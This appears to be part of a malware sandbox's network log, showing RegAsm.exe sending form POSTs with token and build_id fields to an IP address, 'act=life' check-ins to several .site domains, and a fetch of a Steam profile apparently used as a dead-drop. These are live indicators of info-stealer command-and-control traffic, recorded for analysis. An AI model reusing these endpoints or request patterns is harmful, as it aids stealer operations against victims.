                                                                                                                                                      2024-10-03 07:16:44 UTC499OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------DAKJDHIEBFIIDGDGDBAECont
                                                                                                                                                      2024-10-03 07:16:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:45 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:45 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      24192.168.2.649747172.67.208.1414435388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:45 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: questionsmw.store
                                                                                                                                                      2024-10-03 07:16:45 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                      2024-10-03 07:16:45 UTC799INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:45 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=jdj2rq3d0a75mrggtnopkm3osb; expires=Mon, 27 Jan 2025 01:03:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                      vary: accept-encoding
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=INKnYej4bdfNmKZ%2FG3nci%2FSg1VjlPSvmPz%2BjxvAUjNdllu3rRGptAzbDuWOqrmHKe%2FBLkotXzPQwzDBzd86OcOsnnVXMgatKqP7bHVB3RMopHul6Z7rJrlgYugUQjajXTYT0zQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb2605bad41774-EWR
                                                                                                                                                      2024-10-03 07:16:45 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                      2024-10-03 07:16:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      25192.168.2.649748188.114.96.34435388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:45 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: soldiefieop.site
                                                                                                                                                      2024-10-03 07:16:45 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                      2024-10-03 07:16:46 UTC787INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:46 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=okt3snqgipsnoggsp7auq3eqnj; expires=Mon, 27 Jan 2025 01:03:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                      vary: accept-encoding
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6d39EccorWKQ8Onyix9SK1i8RPtpUBjVKZNsaVTXBdN5jhgbQRNDPiDmB41q4Z1zmou%2BRLyFvpFcfsSCoJ4rHTtKyVyYSddhMtnOUX1DEHcnhlbYuyVLimC6M3hnrrRWYq%2BC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb260b88060c8e-EWR
                                                                                                                                                      2024-10-03 07:16:46 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                      2024-10-03 07:16:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      26192.168.2.64974949.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:46 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHC
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 331
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------AEGHIJEHJDHIDHIDAEHCContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------AEGHIJEHJDHIDHIDAEHCContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------AEGHIJEHJDHIDHIDAEHCCont
                                                                                                                                                      2024-10-03 07:16:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:47 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      27192.168.2.649750172.67.152.1904435388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:46 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: abnomalrkmu.site
                                                                                                                                                      2024-10-03 07:16:46 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                      2024-10-03 07:16:47 UTC791INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:47 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=3mcuddpm72bnf4h3ik1gq316dp; expires=Mon, 27 Jan 2025 01:03:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                      vary: accept-encoding
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c5w%2FHTavmcifp4M%2FQt9pUW%2B59rU3e6CcUJpqKuMKFuZ0IXqyIBIo017k6Wz5rSaOVJTKekpmoziN3zMh4091NJw5M6OG2P2PVDnUyY6CxZazQsEbITLDcJ3xy%2BE5aZvlwgsS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb26118ed143b9-EWR
                                                                                                                                                      2024-10-03 07:16:47 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                      2024-10-03 07:16:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      28192.168.2.649752104.21.84.184435388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:47 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: treatynreit.site
                                                                                                                                                      2024-10-03 07:16:47 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                      2024-10-03 07:16:49 UTC770INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:49 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=ah8tedmnbbknld2u2hb852isou; expires=Mon, 27 Jan 2025 01:03:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SxJ9UKS%2Fcs%2FDmNETSvLEW3yqwcWwc0gQ6lybAnXho1Z966x0fkRgrHloJVZyE%2BIzbpsOtDi6akDkcDUz%2Fiis3S6er%2Fdx5FeaxM4dJVIxi8VXDNeorYcjqdQuiVTs8bOqK4xt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb2617add8de96-EWR
                                                                                                                                                      2024-10-03 07:16:49 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                      2024-10-03 07:16:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      29192.168.2.649753104.21.18.1934435388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:49 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: snarlypagowo.site
                                                                                                                                                      2024-10-03 07:16:49 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                      2024-10-03 07:16:50 UTC801INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:50 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=vhtcpdqkbdsbbnq7ngco06lk3v; expires=Mon, 27 Jan 2025 01:03:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                      vary: accept-encoding
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cuXGMQd5ERii2ugEyiqi0ZEW%2BKjy0j%2BP%2BQtB4tUUUrXOJJQhIqDkxd4zESJ%2FmbY24oATrCGWcGgRQPnAsufolBxoOWGLpP3KtDAJgiOrijJcMbFAh3Vmm%2BSw2AfzK09D8ssMEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb26241ad14345-EWR
                                                                                                                                                      2024-10-03 07:16:50 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                      2024-10-03 07:16:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      30192.168.2.649754104.21.21.34435388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:50 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: mysterisop.site
                                                                                                                                                      2024-10-03 07:16:50 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                      2024-10-03 07:16:51 UTC768INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:51 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=dm38t17dnm8ukhrvqq416pu4th; expires=Mon, 27 Jan 2025 01:03:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dm3OPE9xN4OIDvp%2FqQl8G9VCCw0BtMVFc3nJKKFfmCjC775Uko2zYqXJIbjaUtvpPhXqaRj%2BYeyfEfX5k7cucUA0gMlhNIaLhHv9tZSJH9%2F8bMNNW1ctVIzobHU3w3i32IQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb262a284ec329-EWR
                                                                                                                                                      2024-10-03 07:16:51 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                      2024-10-03 07:16:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      31192.168.2.649755104.21.17.1744435388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:51 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Content-Length: 8
                                                                                                                                                      Host: absorptioniw.site
                                                                                                                                                      2024-10-03 07:16:51 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                      2024-10-03 07:16:52 UTC776INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:52 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: PHPSESSID=c4tc726fji3qkl87pf6knuvmcf; expires=Mon, 27 Jan 2025 01:03:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gT1xo6qeKZT6dE4cVLM1Ro18l%2BgavLjH4tRKPegKT5JNoh8LEUeuAEqYCTgDEPFaxQisC1Z3OnfpHjpirFPiMjht0%2Fpawlt%2BFJdTly4zCSJbaGwEIkT%2Fo95vRiv8HeHMybrxJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8ccb2630aab64307-EWR
                                                                                                                                                      2024-10-03 07:16:52 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                      2024-10-03 07:16:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      32192.168.2.649756104.102.49.2544435388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:53 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                      2024-10-03 07:16:53 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:53 GMT
                                                                                                                                                      Content-Length: 34837
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: sessionid=524cec9b07958f3e40c10b70; Path=/; Secure; SameSite=None
                                                                                                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                      2024-10-03 07:16:53 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                      2024-10-03 07:16:53 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                                                      Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                                                      2024-10-03 07:16:53 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                      Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
